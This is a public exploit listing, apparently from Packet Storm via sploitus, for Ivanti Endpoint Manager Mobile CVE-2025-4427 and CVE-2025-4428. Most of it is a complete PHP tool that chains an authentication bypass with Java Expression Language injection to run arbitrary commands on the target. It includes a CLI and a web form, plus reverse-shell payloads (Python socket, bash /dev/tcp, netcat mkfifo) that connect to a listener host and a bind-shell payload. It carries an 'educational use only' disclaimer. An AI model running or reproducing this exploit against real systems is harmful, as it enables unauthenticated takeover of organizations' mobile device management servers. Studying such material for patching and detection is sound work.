Share
## https://sploitus.com/exploit?id=PACKETSTORM:212937
=============================================================================================================================================
    | # Title     : Ivanti Endpoint Manager Mobile 12.5.0.0 Expression Language Injection                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.ivanti.com/products/endpoint-manager-mobile                                                                     |
    =============================================================================================================================================
    
    [+] References :  https://packetstorm.news/files/id/200146/ &  CVE-2025-4427, CVE-2025-4428 
    
    [+] Summary : 
              
                  The exploit targets two critical vulnerabilities in Ivanti EPMM:
                  CVE-2025-4427 - Authentication Bypass
                  CVE-2025-4428 - Expression Language Injection
                  The vulnerability chain allows unauthenticated attackers to execute arbitrary commands 
    			  on the target system through Java Expression Language (EL) injection in the /mifs/rs/api/v2/featureusage endpoint.
    			 
    [+] Exploitation Mechanism
    
        Endpoint Discovery: The exploit targets /mifs/rs/api/v2/featureusage
    
        Payload Injection: Uses Java EL injection via the format parameter
    
        Command Execution: Leverages Java runtime reflection to execute system commands
    
        Result Extraction: Uses Java Scanner class to read command output
    [+]  POC : 
    
    php poc.php  or http://127.0.0.1/poc.php 
    
    php poc.php -t target.com -c
    
    php poc.php -t 192.168.1.100 -P command
    
    php poc.php -t target.com -P reverse_shell -H YOUR_IP -L 4444
    
    <?php
    /*
     * by indoushka
     * CVE-2025-4427, CVE-2025-4428 - Ivanti EPMM RCE Exploit
     */
    
    class IvantiEPMMExploit {
        private $target;
        private $port;
        private $ssl;
        private $base_path;
        private $timeout;
        
        public function __construct($target, $port = 443, $ssl = true, $base_path = '/') {
            $this->target = $target;
            $this->port = $port;
            $this->ssl = $ssl;
            $this->base_path = rtrim($base_path, '/');
            $this->timeout = 30;
        }
        
        /**
         * Vulnerability check
         */
        public function check() {
            echo "[*] Checking Ivanti EPMM vulnerability...\n";
            
            $command = 'id';
            $response = $this->execute_command($command);
            
            if (!$response) {
                echo "[-] Failed to get response from target\n";
                return "unknown";
            }
            
            if (strpos($response, 'uid=') !== false && strpos($response, 'gid=') !== false) {
                echo "[+] โœ“ Target is vulnerable!\n";
                return "vulnerable";
            } else {
                echo "[-] โœ— Target is not vulnerable\n";
                return "safe";
            }
        }
        
        /**
         * Execute remote command
         */
        private function execute_command($command) {
            // Build Expression Language Injection payload
            $payload = $this->build_el_payload($command);
            
            $url = $this->build_url('/mifs/rs/api/v2/featureusage');
            
            $ch = curl_init();
            curl_setopt_array($ch, [
                CURLOPT_URL => $url . '?format=' . urlencode($payload),
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_TIMEOUT => $this->timeout,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            ]);
            
            $response = curl_exec($ch);
            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            
            echo "[*] HTTP Status: $http_code\n";
            
            return $response;
        }
        
        /**
         * Build Expression Language Injection payload
         */
        private function build_el_payload($command) {
            // Java Expression Language Injection for command execution
            $payload = "\${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('{$command}').getInputStream()).useDelimiter('\\\\\\\\A').next()}";
            
            return $payload;
        }
        
        /**
         * Main exploit execution
         */
        public function exploit($payload_type = 'reverse_shell', $lhost = null, $lport = null) {
            echo "[*] Starting Ivanti EPMM exploitation...\n";
            
            // Create payload based on type
            $payload_cmd = $this->generate_payload($payload_type, $lhost, $lport);
            
            if (!$payload_cmd) {
                echo "[-] Failed to generate payload\n";
                return false;
            }
            
            echo "[*] Executing payload...\n";
            $response = $this->execute_command($payload_cmd);
            
            if ($response) {
                echo "[+] โœ“ Payload sent successfully\n";
                echo "[*] Check your reverse connection\n";
                return true;
            } else {
                echo "[-] โœ— Failed to execute payload\n";
                return false;
            }
        }
        
        /**
         * Generate different payloads
         */
        private function generate_payload($type, $lhost, $lport) {
            switch ($type) {
                case 'reverse_shell':
                    if (!$lhost || !$lport) {
                        echo "[-] IP and port required for reverse shell\n";
                        return false;
                    }
                    return $this->generate_reverse_shell($lhost, $lport);
                    
                case 'bind_shell':
                    if (!$lport) {
                        echo "[-] Port required for bind shell\n";
                        return false;
                    }
                    return $this->generate_bind_shell($lport);
                    
                case 'command':
                    return 'id; whoami; uname -a; pwd';
                    
                default:
                    return 'id; whoami';
            }
        }
        
        /**
         * Generate reverse shell
         */
        private function generate_reverse_shell($lhost, $lport) {
            // Multiple reverse shells
            $shells = [
                // Python reverse shell
                "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{$lhost}\",{$lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'",
                
                // Bash reverse shell
                "bash -c 'bash -i >& /dev/tcp/{$lhost}/{$lport} 0>&1'",
                
                // Netcat reverse shell
                "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {$lhost} {$lport} >/tmp/f"
            ];
            
            return $shells[0]; // Use Python as default
        }
        
        /**
         * Generate bind shell
         */
        private function generate_bind_shell($lport) {
            return "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"0.0.0.0\",{$lport}));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0); os.dup2(conn.fileno(),1); os.dup2(conn.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'";
        }
        
        /**
         * Build full URL
         */
        private function build_url($path) {
            $protocol = $this->ssl ? 'https' : 'http';
            $full_path = $this->base_path . $path;
            return "{$protocol}://{$this->target}:{$this->port}{$full_path}";
        }
    }
    
    // CLI Interface
    if (php_sapi_name() === 'cli') {
        echo "
        โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—
        โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•‘โ•šโ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•‘
        โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘
        โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘
        โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘
        โ•šโ•โ•  โ•šโ•โ•โ•โ•  โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•โ•โ•   โ•šโ•โ•   โ•šโ•โ•
        
        Ivanti EPMM RCE ExploitPHP Implementation
        
        \n";
        
        $options = getopt("t:p:s:u:c:P:L:H:", [
            "target:",
            "port:",
            "ssl",
            "uri:",
            "check",
            "payload:",
            "lhost:",
            "lport:"
        ]);
        
        $target = $options['t'] ?? $options['target'] ?? null;
        $port = $options['p'] ?? $options['port'] ?? 443;
        $ssl = isset($options['s']) || isset($options['ssl']);
        $base_uri = $options['u'] ?? $options['uri'] ?? '/';
        $check_only = isset($options['c']) || isset($options['check']);
        $payload_type = $options['P'] ?? $options['payload'] ?? 'command';
        $lhost = $options['H'] ?? $options['lhost'] ?? null;
        $lport = $options['L'] ?? $options['lport'] ?? 4444;
        
        if (!$target) {
            echo "Usage: php poc.php [options]\n";
            echo "Options:\n";
            echo "  -t, --target    Target host (required)\n";
            echo "  -p, --port      Target port (default: 443)\n";
            echo "  -s, --ssl       Use SSL (default: true)\n";
            echo "  -u, --uri       Base URI path (default: /)\n";
            echo "  -c, --check     Check only (don't exploit)\n";
            echo "  -P, --payload   Payload type: command, reverse_shell, bind_shell (default: command)\n";
            echo "  -H, --lhost     Listener host for reverse shell\n";
            echo "  -L, --lport     Listener port for reverse shell (default: 4444)\n";
            echo "\nExamples:\n";
            echo "  php poc.php -t 192.168.1.100 -c\n";
            echo "  php poc.php -t target.com -P reverse_shell -H 10.0.0.5 -L 4444\n";
            exit(1);
        }
        
        $exploit = new IvantiEPMMExploit($target, $port, $ssl, $base_uri);
        
        if ($check_only) {
            $result = $exploit->check();
            echo "\n[*] Result: {$result}\n";
        } else {
            if ($exploit->exploit($payload_type, $lhost, $lport)) {
                echo "[+] Exploitation completed successfully\n";
            } else {
                echo "[-] Exploitation failed\n";
            }
        }
        
    } else {
        // Web Interface - FIXED VERSION
        // Check if form was submitted
        $action = $_POST['action'] ?? '';
        
        if ($action === 'check' || $action === 'exploit') {
            $target = $_POST['target'] ?? '';
            $port = $_POST['port'] ?? 443;
            $ssl = isset($_POST['ssl']);
            $base_uri = $_POST['uri'] ?? '/';
            $payload_type = $_POST['payload_type'] ?? 'command';
            $lhost = $_POST['lhost'] ?? '';
            $lport = $_POST['lport'] ?? 4444;
            
            if (empty($target)) {
                echo "<div style='color: red; padding: 10px; border: 1px solid red; margin: 10px;'>Target host is required</div>";
            } else {
                $exploit = new IvantiEPMMExploit($target, $port, $ssl, $base_uri);
                
                ob_start();
                if ($action === 'check') {
                    $exploit->check();
                } else {
                    $exploit->exploit($payload_type, $lhost, $lport);
                }
                $output = ob_get_clean();
                
                echo "<pre style='background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;'>$output</pre>";
            }
            
            // Show the form again after execution
            echo '<a href="'.htmlspecialchars($_SERVER['PHP_SELF']).'" style="display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;">Back to Form</a>';
        } else {
            // Display the form
            echo '<!DOCTYPE html>
            <html>
            <head>
                <title>Ivanti EPMM RCE Exploit</title>
                <meta charset="UTF-8">
                <style>
                    body { 
                        font-family: Arial, sans-serif; 
                        margin: 0; 
                        padding: 20px; 
                        background: #f5f5f5;
                    }
                    .container { 
                        max-width: 800px; 
                        margin: 0 auto; 
                        background: white;
                        padding: 30px;
                        border-radius: 8px;
                        box-shadow: 0 2px 10px rgba(0,0,0,0.1);
                    }
                    h1 { 
                        color: #333; 
                        border-bottom: 2px solid #007cba;
                        padding-bottom: 10px;
                    }
                    h3 {
                        color: #666;
                    }
                    .form-group { 
                        margin-bottom: 20px; 
                    }
                    label { 
                        display: block; 
                        margin-bottom: 8px; 
                        font-weight: bold;
                        color: #333;
                    }
                    input[type="text"], select { 
                        width: 100%; 
                        padding: 10px; 
                        border: 1px solid #ddd; 
                        border-radius: 4px; 
                        box-sizing: border-box;
                        font-size: 14px;
                    }
                    .checkbox-group {
                        display: flex;
                        align-items: center;
                        gap: 10px;
                    }
                    button { 
                        background: #007cba; 
                        color: white; 
                        padding: 12px 25px; 
                        border: none; 
                        border-radius: 4px; 
                        cursor: pointer; 
                        margin-right: 10px;
                        font-size: 16px;
                        transition: background 0.3s;
                    }
                    button:hover {
                        background: #005a87;
                    }
                    .danger { 
                        background: #dc3545; 
                    }
                    .danger:hover {
                        background: #c82333;
                    }
                    .info { 
                        background: #17a2b8; 
                    }
                    .info:hover {
                        background: #138496;
                    }
                    .warning-box {
                        background: #fff3cd;
                        border: 1px solid #ffeaa7;
                        color: #856404;
                        padding: 15px;
                        border-radius: 4px;
                        margin: 20px 0;
                    }
                    .info-box {
                        background: #d1ecf1;
                        border: 1px solid #bee5eb;
                        color: #0c5460;
                        padding: 15px;
                        border-radius: 4px;
                        margin: 20px 0;
                    }
                </style>
            </head>
            <body>
                <div class="container">
                    <h1>Ivanti EPMM RCE Exploit</h1>
                    <h3>CVE-2025-4427 & CVE-2025-4428 - Authentication Bypass & RCE</h3>
                    
                    <div class="warning-box">
                        <strong>โš ๏ธ Warning:</strong> This tool is for educational and authorized penetration testing purposes only. Unauthorized use is illegal.
                    </div>
                    
                    <form method="post">
                        <div class="form-group">
                            <label for="target">Target Host:</label>
                            <input type="text" id="target" name="target" placeholder="192.168.1.100 or target.com" required>
                        </div>
                        
                        <div class="form-group">
                            <label for="port">Port:</label>
                            <input type="text" id="port" name="port" value="443">
                        </div>
                        
                        <div class="form-group">
                            <label for="uri">Base URI:</label>
                            <input type="text" id="uri" name="uri" value="/">
                        </div>
                        
                        <div class="form-group">
                            <div class="checkbox-group">
                                <input type="checkbox" id="ssl" name="ssl" checked>
                                <label for="ssl" style="display: inline; font-weight: normal;">Use SSL</label>
                            </div>
                        </div>
                        
                        <div class="form-group">
                            <label for="payload_type">Payload Type:</label>
                            <select id="payload_type" name="payload_type">
                                <option value="command">Test Command (id; whoami)</option>
                                <option value="reverse_shell">Reverse Shell</option>
                                <option value="bind_shell">Bind Shell</option>
                            </select>
                        </div>
                        
                        <div class="form-group">
                            <label for="lhost">Listener Host (for reverse shell):</label>
                            <input type="text" id="lhost" name="lhost" placeholder="Your IP address: 192.168.1.100">
                        </div>
                        
                        <div class="form-group">
                            <label for="lport">Listener Port (for reverse shell):</label>
                            <input type="text" id="lport" name="lport" value="4444">
                        </div>
                        
                        <button type="submit" name="action" value="check" class="info">Check Vulnerability</button>
                        <button type="submit" name="action" value="exploit" class="danger">Execute Exploit</button>
                    </form>
                    
                    <div class="info-box">
                        <h3>About CVE-2025-4427 & CVE-2025-4428:</h3>
                        <p><strong>Vulnerability:</strong> Authentication Bypass + Expression Language Injection</p>
                        <p><strong>Affected Products:</strong> Ivanti EPMM, MobileIron Core</p>
                        <p><strong>Impact:</strong> Unauthenticated Remote Code Execution</p>
                        <p><strong>Endpoint:</strong> /mifs/rs/api/v2/featureusage</p>
                        <p><strong>CVSS Score:</strong> 9.8 (Critical)</p>
                    </div>
                </div>
            </body>
            </html>';
        }
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================